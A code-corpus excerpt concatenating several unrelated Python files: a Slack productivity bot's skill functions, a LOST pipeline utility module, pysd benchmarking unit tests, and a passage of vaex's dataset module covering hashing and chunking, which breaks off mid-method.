def github_commit(self, timely: str = "daily"):
"""
keyword: ["커밋", "commit", "깃헙", "github"]
description: "Check [Github](https://github.com) push count."
icon: ":octocat: "
"""
if timely is None:
timely = "daily"
github = GithubManager(slackbot=self.slackbot)
github.commit(timely=timely)
def happy_question(self):
"""
keyword: [["행복도", "조사"], ["행복도", "확인"], ["happy", "question"]]
description: "Happiness survey."
icon: ":smile: "
"""
happy = HappyQuestion(slackbot=self.slackbot)
happy.question()
def happy_report(self, timely: str = "daily"):
"""
keyword: [["행복도", "리포트"], ["happy", "report"]]
description: "Happiness Report."
icon: ":smile: "
"""
if timely is None:
timely = "daily"
happy = HappyQuestion(slackbot=self.slackbot)
happy.report(timely=timely)
def honeyjam(self):
"""
keyword: [["재밌는", "이야기"], ["개그"]]
description: "**Easter Egg** - Korea Azae Humor (using [honeyjam](https://github.com/DongjunLee/honeyjam))."
icon: ":honey_pot: "
"""
humor = Humor()
question, answer = humor.honeyjam()
self.slackbot.send_message(text=MsgResource.HUMOR_QUESTION(question=question))
time.sleep(2)
self.slackbot.send_message(text=MsgResource.HUMOR_ANSWER(answer=answer))
haha_num = random.randint(1, 5)
self.slackbot.send_message(text=MsgResource.HUMOR_END(haha_num))
sorry_index = random.randint(1, 100)
if sorry_index < 25:
time.sleep(1)
self.slackbot.send_message(text=MsgResource.HUMOR_SORRY)
def jenkins_build(self, job_name: str = None, branch: str = None):
"""
keyword: ["배포", "deploy"]
description: "Build a registered project for Jenkins."
icon: ":building_construction: "
"""
jenkins = JenkinsClient()
jenkins.build(job_name, branch)
def kanban_sync(self):
"""
keyword: [["칸반", "싱크"], ["kanban", "sync"]]
description: "Todoist's tasks and Kanban board's card Syncing."
icon: ":clipboard: "
"""
self.slackbot.send_message(text=MsgResource.KANBAN_SYNC)
todoist = TodoistManager(slackbot=self.slackbot)
today_label_tasks = todoist.get_today_tasks_with_label()
trello = TrelloManager()
task_list = trello.get_list_by_name(self.KANBAN_TASKS)
task_list.archive_all_cards()
for task in today_label_tasks:
card_name = task["label"] + " - " + task["content"]
task_list.add_card(re.sub(r" \d+분", "", card_name))
def keep_idea(self, hashtag: str = None):
"""
keyword: [["keep", "idea"], ["킵", "아이디어"], ["아이디어", "저장"], ["아이디어", "기억"]]
description: "Keep idea in Trello board's inbox list."
icon: ":thinking_face: "
"""
if hashtag is None:
self.slackbot.send_message(text=MsgResource.HASHTAG_NOT_FOUND)
return
trello = TrelloManager()
trello.add_card(self.IDEA_LIST, hashtag)
self.slackbot.send_message(text=MsgResource.ADD_IDEA)
def maxim_nietzsche(self):
"""
keyword: [["니체", "명언"], ["nietzsche", "maxim"]]
description: "Nietzsche's Maxim."
icon: ":scales: "
"""
maxim = Maxim(slackbot=self.slackbot)
maxim.nietzsche()
def remind_idea(self):
"""
keyword: [["remind", "idea"], ["리마인드", "아이디어"]]
description: "Remind Trello's inbox card randomly pick."
icon: ":thinking_face: "
"""
trello = TrelloManager()
idea = trello.get_random_card_name()
if idea is None:
self.slackbot.send_message(text=MsgResource.EMPTY_IDEA)
else:
self.slackbot.send_message(text=MsgResource.REMIND_IDEA(idea=idea))
def rescuetime_efficiency(self, timely: str = "daily"):
"""
keyword: ["레스큐타임 효율성", "작업 효율", "생산성 차트", ["rescuetime", "chart"]]
description: "RescueTime Efficiency Chart"
icon: ":chart_with_upwards_trend: "
"""
if timely is None:
timely = "daily"
rescuetime = RescueTime(slackbot=self.slackbot)
rescuetime.efficiency(timely=timely)
def samhangsi(self, samhangsi_tag: str = None):
"""
keyword: ["삼행시"]
description: "I am thinking about the Samhangsi with the kor ballad! (using [char-rnn-tensorflow](https://github.com/DongjunLee/char-rnn-tensorflow))"
icon: ":musical_score: "
"""
word = samhangsi_tag[1:]
non_hangul = re.findall("[^ ㄱ-ㅣ가-힣]+", word)
if len(non_hangul) > 0:
self.slackbot.send_message(text=MsgResource.SAMHANGSI_ONLY_KOR)
return
self.slackbot.send_message(text=MsgResource.SAMHANGSI_PREPARE(word=word))
generator = SamhangSiGenerator()
generator.load_model()
result = generator.generate(word)
self.slackbot.send_message(text=result)
def send_message(self, text: str = None):
"""
keyword: []
description: "Send a text message."
icon: ":speech_balloon: "
"""
self.slackbot.send_message(text=text)
def today_briefing(self):
"""
keyword: [["하루", "브리핑"], ["오늘하루", "브리핑"], ["today", "briefing"]]
description: "Today Briefing - brief Todoist tasks"
icon: ":city_sunset: "
"""
todoist = TodoistManager(slackbot=self.slackbot)
todoist.schedule()
def today_summary(self, timely: str = None):
"""
keyword: [["하루", "마무리"], ["하루", "요약"], ["today", "summary"]]
description: "Today summary - **toggl_report**, **rescuetime_efficiency**, **happy_report**, **attention_report**, **github_commit**"
icon: ":night_with_stars: "
"""
self.slackbot.send_message(text=MsgResource.TODAY_SUMMARY)
# self.todoist_feedback()
self.toggl_report(timely=timely)
self.rescuetime_efficiency(timely=timely)
self.happy_report(timely=timely)
self.attention_report(timely=timely)
self.github_commit(timely=timely)
def todoist_feedback(self):
"""
keyword: [["할일", "피드백"], ["todoist", "feedback"]]
description: "Feedback from Todoist activity."
icon: ":memo: "
"""
todoist = TodoistManager(slackbot=self.slackbot)
todoist.feedback()
def todoist_remain(self):
"""
keyword: [["남은", "작업"], ["remain", "task"]]
description: "Show todoist's remaining tasks."
icon: ":page_with_curl: "
"""
todoist = TodoistManager(slackbot=self.slackbot)
todoist.remain_task()
def toggl_checker(self):
"""
keyword: [["작업", "시간"], ["시간", "체크"], ["task", "time", "check"]]
description: "Toggl time checker Every 30 minutes."
icon: ":bell: "
"""
toggl = TogglManager(slackbot=self.slackbot)
toggl.check_toggl_timer()
def toggl_report(self, kind: str = "chart", timely: str = "daily"):
"""
keyword: [["작업", "리포트"], ["task", "report"]]
description: "Toggl task Report."
icon: ":bar_chart: "
"""
if kind is None:
kind = "chart"
if timely is None:
timely = "daily"
toggl = TogglManager(slackbot=self.slackbot)
toggl.report(kind=kind, timely=timely)
def toggl_timer(self, description: str = None):
"""
keyword: ["toggl"]
description: "Toggl Timer."
icon: ":watch: "
"""
toggl = TogglManager(slackbot=self.slackbot)
toggl.timer(description=description)
def total_chart(self):
"""
keyword: [["종합", "차트"], ["overall", "chart"], ["total", "chart"]]
description: "Overall chart - weekly productivity, happiness, overall score chart."
icon: ":chart: "
"""
summary = Summary(slackbot=self.slackbot)
summary.total_chart()
def total_score(self):
"""
keyword: [["종합", "점수"], ["overall", "score"], ["total", "score"]]
description: "Overall score - Productivity (RescueTime, Github Commit, Todoist, Toggl), Mean happiness, mean attention, Exercise, Diary."
icon: ":chart: "
"""
summary = Summary(slackbot=self.slackbot)
summary.total_score()
def translate(self, english: str = "", source: str = "en", target: str = "ko"):
"""
keyword: ["번역", "translate"]
description: "Language translation using [Naver Papago api](https://developers.naver.com/docs/nmt/reference/)."
icon: ":crystal_ball: "
"""
if source is None:
source = "en"
if target is None:
target = "ko"
naver = Naver(slackbot=self.slackbot)
naver.translate(english, source=source, target=target)
class RegisteredFuctions(object):
class __List:
def __init__(self):
self.list = DataHandler().read_file("skills.json")
instance = None
def __init__(self):
if not RegisteredFuctions.instance:
RegisteredFuctions.instance = RegisteredFuctions.__List()
def __getattr__(self, name):
return getattr(self.instance, name)
class FunctionRunner(object):
def __init__(self, text=None):
self.input = text
self.functions = Functions().registered
self.logger = Logger().get_logger()
def load_function(
self,
start_time=None,
end_time=None,
func_name=None,
params=None,
repeat=False,
day_of_week=None,
not_holiday=False,
):
if not_holiday and Summary().is_holiday():
return
if not ArrowUtil.is_today_day_of_week(day_of_week):
return
if not repeat:
self.__excute(func_name, params)
return schedule.CancelJob
elif (repeat) and (ArrowUtil.is_between(start_time, end_time)):
self.__excute(func_name, params)
def __excute(self, func_name, params):
self.logger.info("load_function: " + str(func_name) + ", " + str(params))
getattr(Functions(), func_name)(**params)
def filter_f_params(self, text, func_name):
ner = NamedEntitiyRecognizer()
func_param_list = ner.skills[func_name]["params"]
params = {k: ner.parse(v, text) for k, v in ner.params.items()}
member = Member()
member_name = member.get_names(text)
params["member"] = member_name
f_params = {}
if params is not None:
for k, v in params.items():
if k in func_param_list and v is not None:
f_params[k] = v
return f_params
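# --- scheduling sketch (assumption: `schedule` re-exported from .background is the
# --- `schedule` package, where returning schedule.CancelJob removes a one-shot job;
# --- argument values are hypothetical):
#   runner = FunctionRunner()
#   schedule.every().day.at("08:00").do(
#       runner.load_function, func_name="good_morning", params={}, repeat=False)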
|
backend/lost/logic/pipeline/exec_utils.py
|
JonasGoebel/lost
| 490 |
76050
|
<reponame>JonasGoebel/lost
import os
import hashlib
import importlib
import zipfile
def zipdir(path, out_path, timestamp=None):
# zipf is zipfile handle
zipf = zipfile.ZipFile(out_path, 'w', zipfile.ZIP_DEFLATED)
for root, dirs, files in os.walk(path):
for file in files:
src = os.path.join(root, file)
if timestamp is None:
dst = os.path.relpath(os.path.join(root, file),
os.path.join(path, '..'))
else:
dst = os.path.relpath(os.path.join(f'{root}_{timestamp}', file),
os.path.join(path, '..'))
zipf.write(src, dst)
zipf.close()
# def module_to_bytes(path, ignore=['__pycache__']):
# # zipf is zipfile handle
# cont = b''
# for root, dirs, files in os.walk(path):
# for file in files:
# for i in ignore:
# src = os.path.join(root, file)
# if i not in src:
# with open(src, 'rb') as f:
# cont += f.read()
# return cont
def get_module_hash(path, ignore=['__pycache__']):
    # walk the module directory and hash every file's contents (skipping `ignore` entries)
sha = hashlib.sha256()
for root, dirs, files in os.walk(path):
for file in files:
for i in ignore:
src = os.path.join(root, file)
if i not in src:
with open(src, 'rb') as f:
sha.update(f.read())
# cont += f.read()
return sha.hexdigest()
def import_by_string(full_name):
module_name, unit_name = full_name.rsplit('.', 1)
mod = importlib.import_module(module_name)
return getattr(mod, unit_name)
def exec_dyn_class(idx, class_name):
my_class = import_by_string(class_name)
instance = my_class(idx)
return instance._run(ret_success=True)
def get_import_name_by_script(script_name, timestamp=None):
mod_name = os.path.splitext(script_name)[0]
if timestamp is not None:
mod_list = mod_name.split('.')
mod_list[0] = f'{mod_list[0]}_{timestamp}'
mod_name = '.'.join(mod_list)
return f'{mod_name}.LostScript'
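# --- usage sketch (hypothetical names; exercises only the helpers defined above) ---
if __name__ == '__main__':
    # resolve a dotted path to an attribute
    print(import_by_string('collections.OrderedDict'))
    # pipeline scripts are addressed as '<module>[_<timestamp>].LostScript'
    print(get_import_name_by_script('my_script.py'))                   # my_script.LostScript
    print(get_import_name_by_script('my_script.py', timestamp='123'))  # my_script_123.LostScript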
|
tests/unit_test_benchmarking.py
|
JamesPHoughton/pysd
| 240 |
76069
|
import os
from unittest import TestCase
# most of the features of this script are already tested indirectly when
# running vensim and xmile integration tests
_root = os.path.dirname(__file__)
class TestErrors(TestCase):
def test_canonical_file_not_found(self):
from pysd.tools.benchmarking import runner
with self.assertRaises(FileNotFoundError) as err:
runner(os.path.join(_root, "more-tests/not_existent.mdl"))
self.assertIn(
'Canonical output file not found.',
str(err.exception))
def test_non_valid_model(self):
from pysd.tools.benchmarking import runner
with self.assertRaises(ValueError) as err:
runner(os.path.join(
_root,
"more-tests/not_vensim/test_not_vensim.txt"))
self.assertIn(
'Modelfile should be *.mdl or *.xmile',
str(err.exception))
def test_non_valid_outputs(self):
from pysd.tools.benchmarking import load_outputs
with self.assertRaises(ValueError) as err:
load_outputs(
os.path.join(
_root,
"more-tests/not_vensim/test_not_vensim.txt"))
self.assertIn(
"Not able to read '",
str(err.exception))
self.assertIn(
"more-tests/not_vensim/test_not_vensim.txt'.",
str(err.exception))
def test_different_frames_error(self):
from pysd.tools.benchmarking import load_outputs, assert_frames_close
with self.assertRaises(AssertionError) as err:
assert_frames_close(
load_outputs(os.path.join(_root, "data/out_teacup.csv")),
load_outputs(
os.path.join(_root, "data/out_teacup_modified.csv")))
self.assertIn(
"Following columns are not close:\n\tTeacup Temperature",
str(err.exception))
self.assertNotIn(
"Column 'Teacup Temperature' is not close.",
str(err.exception))
self.assertNotIn(
"Actual values:\n\t",
str(err.exception))
self.assertNotIn(
"Expected values:\n\t",
str(err.exception))
with self.assertRaises(AssertionError) as err:
assert_frames_close(
load_outputs(os.path.join(_root, "data/out_teacup.csv")),
load_outputs(
os.path.join(_root, "data/out_teacup_modified.csv")),
verbose=True)
self.assertIn(
"Following columns are not close:\n\tTeacup Temperature",
str(err.exception))
self.assertIn(
"Column 'Teacup Temperature' is not close.",
str(err.exception))
self.assertIn(
"Actual values:\n\t",
str(err.exception))
self.assertIn(
"Expected values:\n\t",
str(err.exception))
def test_different_frames_warning(self):
from warnings import catch_warnings
from pysd.tools.benchmarking import load_outputs, assert_frames_close
with catch_warnings(record=True) as ws:
assert_frames_close(
load_outputs(os.path.join(_root, "data/out_teacup.csv")),
load_outputs(
os.path.join(_root, "data/out_teacup_modified.csv")),
assertion="warn")
# use only user warnings
wu = [w for w in ws if issubclass(w.category, UserWarning)]
self.assertEqual(len(wu), 1)
self.assertIn(
"Following columns are not close:\n\tTeacup Temperature",
str(wu[0].message))
self.assertNotIn(
"Column 'Teacup Temperature' is not close.",
str(wu[0].message))
self.assertNotIn(
"Actual values:\n\t",
str(wu[0].message))
self.assertNotIn(
"Expected values:\n\t",
str(wu[0].message))
with catch_warnings(record=True) as ws:
assert_frames_close(
load_outputs(os.path.join(_root, "data/out_teacup.csv")),
load_outputs(
os.path.join(_root, "data/out_teacup_modified.csv")),
assertion="warn", verbose=True)
# use only user warnings
wu = [w for w in ws if issubclass(w.category, UserWarning)]
self.assertEqual(len(wu), 1)
self.assertIn(
"Following columns are not close:\n\tTeacup Temperature",
str(wu[0].message))
self.assertIn(
"Column 'Teacup Temperature' is not close.",
str(wu[0].message))
self.assertIn(
"Actual values:\n\t",
str(wu[0].message))
self.assertIn(
"Expected values:\n\t",
str(wu[0].message))
def test_transposed_frame(self):
from pysd.tools.benchmarking import load_outputs, assert_frames_close
assert_frames_close(
load_outputs(os.path.join(_root, "data/out_teacup.csv")),
load_outputs(
os.path.join(_root, "data/out_teacup_transposed.csv"),
transpose=True))
def test_load_columns(self):
from pysd.tools.benchmarking import load_outputs
out0 = load_outputs(
os.path.join(_root, "data/out_teacup.csv"))
out1 = load_outputs(
os.path.join(_root, "data/out_teacup.csv"),
columns=["Room Temperature", "Teacup Temperature"])
out2 = load_outputs(
os.path.join(_root, "data/out_teacup_transposed.csv"),
transpose=True,
columns=["Heat Loss to Room"])
self.assertEqual(
set(out1.columns),
set(["Room Temperature", "Teacup Temperature"]))
self.assertEqual(
set(out2.columns),
set(["Heat Loss to Room"]))
self.assertTrue((out0.index == out1.index).all())
self.assertTrue((out0.index == out2.index).all())
def test_different_cols(self):
from warnings import catch_warnings
from pysd.tools.benchmarking import assert_frames_close
import pandas as pd
d1 = pd.DataFrame({'a': [1, 2], 'b': [3, 4], 'd': [6, 7]})
d2 = pd.DataFrame({'a': [1, 2]})
d3 = pd.DataFrame({'a': [1, 2], 'c': [3, 4]})
with self.assertRaises(ValueError) as err:
assert_frames_close(
actual=d1,
expected=d2)
self.assertIn(
"Columns from actual and expected values must be equal.",
str(err.exception))
with catch_warnings(record=True) as ws:
assert_frames_close(
actual=d1,
expected=d2,
assertion="warn")
# use only user warnings
wu = [w for w in ws if issubclass(w.category, UserWarning)]
self.assertEqual(len(wu), 1)
self.assertIn("'b'", str(wu[0].message))
self.assertIn("'d'", str(wu[0].message))
self.assertIn(
"from actual values not found in expected values.",
str(wu[0].message))
with catch_warnings(record=True) as ws:
assert_frames_close(
expected=d1,
actual=d2,
assertion="warn")
# use only user warnings
wu = [w for w in ws if issubclass(w.category, UserWarning)]
self.assertEqual(len(wu), 1)
self.assertIn("'b'", str(wu[0].message))
self.assertIn("'d'", str(wu[0].message))
self.assertIn(
"from expected values not found in actual values.",
str(wu[0].message))
with catch_warnings(record=True) as ws:
assert_frames_close(
actual=d1,
expected=d3,
assertion="warn")
# use only user warnings
wu = [w for w in ws if issubclass(w.category, UserWarning)]
self.assertEqual(len(wu), 1)
self.assertIn("'b'", str(wu[0].message))
self.assertIn("'d'", str(wu[0].message))
self.assertIn(
"from actual values not found in expected values.",
str(wu[0].message))
self.assertIn(
"Columns 'c' from expected values not found in actual "
"values.", str(wu[0].message))
def test_invalid_input(self):
from pysd.tools.benchmarking import assert_frames_close
with self.assertRaises(TypeError) as err:
assert_frames_close(
actual=[1, 2],
expected=[1, 2])
self.assertIn(
"Inputs must both be pandas DataFrames.",
str(err.exception))
|
packages/vaex-core/vaex/dataset.py
|
And0k/vaex
| 337 |
76090
|
from abc import abstractmethod, abstractproperty
import os
from pathlib import Path
import collections.abc
import logging
import pkg_resources
import uuid
from urllib.parse import urlparse
from typing import Set, List
import threading
import numpy as np
from frozendict import frozendict
import pyarrow as pa
import vaex
import vaex.execution
import vaex.settings
import vaex.utils
from vaex.array_types import data_type
from .column import Column, ColumnIndexed, supported_column_types
from . import array_types
from vaex import encoding
logger = logging.getLogger('vaex.dataset')
opener_classes = []
HASH_VERSION = "1"
HASH_VERSION_KEY = "version"
chunk_size_default = vaex.settings.main.chunk.size or 1024**2
_dataset_types = {}
lock = threading.Lock()
def register(cls, name=None):
    name = name or getattr(cls, 'snake_name', None) or cls.__name__
_dataset_types[name] = cls
return cls
@encoding.register('dataset')
class dataset_encoding:
@staticmethod
def encode(encoding, dataset):
return dataset.encode(encoding)
@staticmethod
def decode(encoding, dataset_spec):
dataset_spec = dataset_spec.copy()
type = dataset_spec.pop('dataset_type')
cls = _dataset_types[type]
return cls.decode(encoding, dataset_spec)
def open(path, fs_options={}, fs=None, *args, **kwargs):
failures = []
    with lock: # since we cache, make this thread safe
if not opener_classes:
for entry in pkg_resources.iter_entry_points(group='vaex.dataset.opener'):
logger.debug('trying opener: ' + entry.name)
try:
opener = entry.load()
opener_classes.append(opener)
except Exception as e:
logger.exception('issue loading ' + entry.name)
failures.append((e, entry))
# first the quick path
for opener in opener_classes:
if opener.quick_test(path, fs_options=fs_options, fs=fs):
if opener.can_open(path, fs_options=fs_options, fs=fs, *args, **kwargs):
return opener.open(path, fs_options=fs_options, fs=fs, *args, **kwargs)
# otherwise try all openers
for opener in opener_classes:
try:
if opener.can_open(path, fs_options=fs_options, fs=fs, *args, **kwargs):
return opener.open(path, fs_options=fs_options, fs=fs, *args, **kwargs)
except Exception as e:
failures.append((e, opener))
failures = "\n".join([f'\n-----{who}-----\n:' + vaex.utils.format_exception_trace(e) for e, who in failures])
if failures:
raise IOError(f'Cannot open {path}, failures: {failures}.')
else:
        raise IOError(f'Cannot open {path}, nobody knows how to read it.')
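# --- registration sketch (hypothetical plugin; the entry-point group name is the
# --- one iterated above). In the plugin's setup.py:
#   entry_points={'vaex.dataset.opener': ['my_format = my_pkg.opener:MyOpener']}
# --- where MyOpener implements quick_test(path, fs_options, fs),
# --- can_open(path, fs_options, fs, ...) and open(path, fs_options, fs, ...).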
def _to_bytes(ar):
try:
return ar.view(np.uint8)
except ValueError:
return ar.copy().view(np.uint8)
def hash_combine(*hashes):
hasher = vaex.utils.create_hasher(large_data=False)
for hash in hashes:
hasher.update(hash.encode())
return hasher.hexdigest()
def hash_slice(hash, start, end):
hasher = vaex.utils.create_hasher(hash.encode(), large_data=False)
slice = np.array([start, end], dtype=np.int64)
hasher.update(_to_bytes(slice))
return hasher.hexdigest()
def hash_array_data(ar):
# this function should stay consistent with all future versions
# since this is the expensive part of the hashing
if isinstance(ar, np.ndarray):
ar = ar.ravel()
if ar.dtype == np.object_:
return {"type": "numpy", "data": str(uuid.uuid4()), "mask": None}
if np.ma.isMaskedArray(ar):
data_byte_ar = _to_bytes(ar.data)
hasher = vaex.utils.create_hasher(data_byte_ar, large_data=True)
hash_data = {"type": "numpy", "data": hasher.hexdigest(), "mask": None}
if ar.mask is not True and ar.mask is not False and ar.mask is not np.True_ and ar.mask is not np.False_:
mask_byte_ar = _to_bytes(ar.mask)
hasher = vaex.utils.create_hasher(mask_byte_ar, large_data=True)
hash_data["mask"] = hasher.hexdigest()
return hash_data
else:
try:
byte_ar = _to_bytes(ar)
except ValueError:
byte_ar = ar.copy().view(np.uint8)
hasher = vaex.utils.create_hasher(byte_ar, large_data=True)
hash_data = {"type": "numpy", "data": hasher.hexdigest(), "mask": None}
elif isinstance(ar, (pa.Array, pa.ChunkedArray)):
hasher = vaex.utils.create_hasher(large_data=True)
buffer_hashes = []
hash_data = {"type": "arrow", "buffers": buffer_hashes}
if isinstance(ar, pa.ChunkedArray):
chunks = ar.chunks
else:
chunks = [ar]
for chunk in chunks:
for buffer in chunk.buffers():
if buffer is not None:
hasher.update(memoryview(buffer))
buffer_hashes.append(hasher.hexdigest())
else:
buffer_hashes.append(None)
elif isinstance(ar, vaex.column.Column):
hash_data = {"type": "column", "fingerprint": ar.fingerprint()}
else:
raise TypeError
return hash_data
def hash_array(ar, hash_info=None, return_info=False):
# this function can change over time, as it builds on top of the expensive part
# (hash_array_data), so we can cheaply calculate new hashes if we pass on hash_info
if hash_info is None:
hash_info = hash_array_data(ar)
if hash_info.get(HASH_VERSION_KEY) == HASH_VERSION: # TODO: semver check?
return hash_info['hash'], hash_info
if isinstance(ar, np.ndarray):
if ar.dtype == np.object_:
return hash_info['data'] # uuid, so always unique
if np.ma.isMaskedArray(ar):
if not (hash_info['type'] == 'numpy' and hash_info['data'] and hash_info['mask']):
hash_info = hash_array_data(ar)
else:
if not (hash_info['type'] == 'numpy' and hash_info['data']):
hash_info = hash_array_data(ar)
keys = [HASH_VERSION, hash_info['type'], hash_info['data']]
if hash_info['mask']:
keys.append(hash_info['mask'])
elif isinstance(ar, vaex.array_types.supported_arrow_array_types):
if not (hash_info['type'] == 'arrow' and hash_info['buffers']):
hash_info = hash_array_data(ar)
keys = [HASH_VERSION]
keys.extend(["NO_BUFFER" if not b else b for b in hash_info['buffers']])
elif isinstance(ar, vaex.column.Column):
if not (hash_info['type'] == 'column'):
hash_info = hash_array_data(ar)
keys = [HASH_VERSION]
keys.append(hash_info['fingerprint'])
hasher = vaex.utils.create_hasher(large_data=False) # small amounts of data
for key in keys:
hasher.update(key.encode('ascii'))
hash = hasher.hexdigest()
if return_info:
hash_info['hash'] = hash
hash_info[HASH_VERSION_KEY] = HASH_VERSION
return hash, hash_info
else:
return hash
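# --- usage sketch of the hash helpers above (relies only on functions in this file):
#   h1, info = hash_array(np.arange(10), return_info=True)
#   h2, _ = hash_array(np.arange(10), hash_info=info)   # cheap path; h2 == h1
#   combined = hash_combine(h1, hash_slice(h1, 0, 5))    # fingerprint of a derived slice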
def to_supported_array(ar):
if not isinstance(ar, supported_column_types):
ar = np.asanyarray(ar)
if isinstance(ar, np.ndarray) and ar.dtype.kind == 'U':
ar = vaex.column.ColumnArrowLazyCast(ar, pa.string())
elif isinstance(ar, np.ndarray) and ar.dtype.kind == 'O':
ar_data = ar
if np.ma.isMaskedArray(ar):
ar_data = ar.data
try:
# "k != k" is a way to detect NaN's and NaT's
types = list({type(k) for k in ar_data if k is not None and k == k})
except ValueError:
# If there is an array value in the column, Numpy throws a ValueError
# "The truth value of an array with more than one element is ambiguous".
# We don't handle this by default as it is a bit slower.
def is_missing(k):
if k is None:
return True
try:
# a way to detect NaN's and NaT
return not (k == k)
except ValueError:
# if a value is an array, this will fail, and it is a non-missing
return False
            types = list({type(k) for k in ar_data if not is_missing(k)})
if len(types) == 1 and issubclass(types[0], str):
# TODO: how do we know it should not be large_string?
# self._dtypes_override[valid_name] = pa.string()
ar = vaex.column.ColumnArrowLazyCast(ar, pa.string())
if len(types) == 0: # can only be if all nan right?
ar = ar.astype(np.float64)
return ar
def _concat_chunk_list(list_of_chunks):
dict_of_list_of_arrays = collections.defaultdict(list)
for chunks in list_of_chunks:
for name, array in chunks.items():
if isinstance(array, pa.ChunkedArray):
dict_of_list_of_arrays[name].extend(array.chunks)
else:
dict_of_list_of_arrays[name].append(array)
chunks = {name: vaex.array_types.concat(arrays) for name, arrays in dict_of_list_of_arrays.items()}
return chunks
def _slice_of_chunks(chunks_ready_list, chunk_size):
current_row_count = 0
chunks_current_list = []
while current_row_count < chunk_size and chunks_ready_list:
chunks_current = chunks_ready_list.pop(0)
chunk = list(chunks_current.values())[0]
# chunks too large, split, and put back a part
if current_row_count + len(chunk) > chunk_size:
strict = True
if strict:
needed_length = chunk_size - current_row_count
current_row_count += needed_length
assert current_row_count == chunk_size
chunks_head = {name: vaex.array_types.slice(chunk, 0, needed_length) for name, chunk in chunks_current.items()}
chunks_current_list.append(chunks_head)
chunks_extra = {name: vaex.array_types.slice(chunk, needed_length) for name, chunk in chunks_current.items()}
chunks_ready_list.insert(0, chunks_extra) # put back the extra in front
else:
current_row_count += len(chunk)
chunks_current_list.append(chunks_current)
else:
current_row_count += len(chunk)
chunks_current_list.append(chunks_current)
return chunks_current_list, current_row_count
def chunk_rechunk(chunk_iter, chunk_size):
chunks_ready_list = []
i1 = i2 = 0
for _, _, chunks in chunk_iter:
chunks_ready_list.append(chunks)
total_row_count = sum([len(list(k.values())[0]) for k in chunks_ready_list])
if total_row_count > chunk_size:
chunks_current_list, current_row_count = vaex.dataset._slice_of_chunks(chunks_ready_list, chunk_size)
i2 += current_row_count
chunks = vaex.dataset._concat_chunk_list(chunks_current_list)
yield i1, i2, chunks
i1 = i2
while chunks_ready_list:
chunks_current_list, current_row_count = vaex.dataset._slice_of_chunks(chunks_ready_list, chunk_size)
i2 += current_row_count
chunks = vaex.dataset._concat_chunk_list(chunks_current_list)
yield i1, i2, chunks
i1 = i2
def _rechunk(chunk_iter, chunk_size):
def wrapper():
i1 = i2 = 0
for chunks in chunk_iter:
i2 += len(list(chunks.values())[0])
yield i1, i2, chunks
i1 = i2
yield from chunk_rechunk(wrapper(), chunk_size)
def empty_chunk_iterator(start, end, chunk_size):
length = end - start
i1 = 0
i2 = min(length, i1 + chunk_size)
while i1 < length:
yield i1, i2, {}
i1 = i2
i2 = min(length, i1 + chunk_size)
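# --- worked example of the rechunk helpers above (toy sizes; assumes
# --- vaex.array_types.concat/slice accept plain numpy arrays):
#   gen = iter([{'x': np.arange(3)}, {'x': np.arange(3, 7)}])
#   [(i1, i2, len(c['x'])) for i1, i2, c in _rechunk(gen, chunk_size=5)]
#   # -> [(0, 5, 5), (5, 7, 2)]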
class Dataset(collections.abc.Mapping):
def __init__(self):
super().__init__()
self._columns = frozendict()
self._row_count = None
self._id = str(uuid.uuid4())
self._cached_fingerprint = None
def __repr__(self):
import yaml
data = self.__repr_data__()
return yaml.dump(data, sort_keys=False, indent=4)
def __repr_data__(self):
state = self.__getstate__()
def normalize(v):
if isinstance(v, Dataset):
return v.__repr_data__()
if isinstance(v, frozendict):
return dict(v)
if isinstance(v, vaex.dataframe.DataFrame):
return {'type': 'dataframe', 'repr': repr(v)}
if isinstance(v, np.ndarray):
return v.tolist()
return v
return {'type': self.snake_name, **{k: normalize(v) for k, v in state.items() if not k.startswith('_')}}
@property
def id(self):
'''id that uniquely identifies a dataset at runtime'''
return self.fingerprint
@property
def fingerprint(self):
        '''id that uniquely identifies a dataset across runtimes; might be more expensive and require hashing'''
if self._cached_fingerprint is None:
self._cached_fingerprint = self._fingerprint
return self._cached_fingerprint
@abstractproperty
def _fingerprint(self):
pass
def encode(self, encoding):
if not encoding.has_object_spec(self.id):
spec = self._encode(encoding)
encoding.set_object_spec(self.id, spec)
return {'dataset_type': self.snake_name, 'object-id': self.id}
@classmethod
def decode(cls, encoding, spec):
id = spec['object-id']
if not encoding.has_object(id):
spec = encoding.get_object_spec(id)
ds = cls._decode(encoding, spec)
encoding.set_object(id, ds)
return encoding.get_object(id)
@abstractmethod
def _create_columns(self):
pass
@property
def name(self):
# TODO: in the future, we might want to use self.fingerprint or self.id
return "no-name"
def __getstate__(self):
state = self.__dict__.copy()
del state['_columns']
del state['_cached_fingerprint']
return state
def __setstate__(self, state):
self.__dict__.update(state)
self._cached_fingerprint = None
self._create_columns()
def schema(self, array_type=None):
return {name: vaex.array_types.data_type(col) for name, col in self.items()}
def shapes(self):
return {name: self.shape(name) for name, col in self.items()}
def _set_row_count(self):
if not self._columns:
return
values = list(self._columns.values())
self._row_count = len(values[0])
for name, value in list(self._columns.items())[1:]:
if len(value) != self._row_count:
                raise ValueError(f'First column has length {self._row_count}, while column {name} has length {len(value)}')
@property
def row_count(self):
return self._row_count
def project(self, *names):
all = set(self)
drop = all - set(names)
# we want a deterministic order for fingerprints
drop = list(drop)
drop.sort()
return self.dropped(*list(drop))
def concat(self, *others, resolver='flexible'):
datasets = []
if isinstance(self, DatasetConcatenated):
datasets.extend(self.datasets)
else:
datasets.extend([self])
for other in others:
if isinstance(other, DatasetConcatenated):
datasets.extend(other.datasets)
else:
datasets.extend([other])
return DatasetConcatenated(datasets, resolver=resolver)
def take(self, indices, masked=False):
return DatasetTake(self, indices, masked=masked)
def renamed(self, renaming):
return DatasetRenamed(self, renaming)
def merged(self, rhs):
return DatasetMerged(self, rhs)
def dropped(self, *names):
return DatasetDropped(self, names)
def __getitem__(self, item):
if isinstance(item, slice):
assert item.step in [1, None]
return self.slice(item.start or 0, item.stop or self.row_count)
return self._columns[item]
def __len__(self):
return len(self._columns)
def __iter__(self):
return iter(self._columns)
def get_data(self, i1, i2, names):
raise NotImplementedError
def __eq__(self, rhs):
if not isinstance(rhs, Dataset):
return NotImplemented
# simple case, if fingerprints are equal, the data is equal
if self.fingerprint == rhs.fingerprint:
return True
        # but not the other way around
keys = set(self)
keys_hashed = set(self._ids)
missing = keys ^ keys_hashed
if missing:
return self.fingerprint == rhs.fingerprint
keys = set(rhs)
keys_hashed = set(rhs._ids)
missing = keys ^ keys_hashed
if missing:
return self.fingerprint == rhs.fingerprint
return self._ids == rhs._ids
def __hash__(self):
keys = set(self)
keys_hashed = set(self._ids)
missing = keys ^ keys_hashed
if missing:
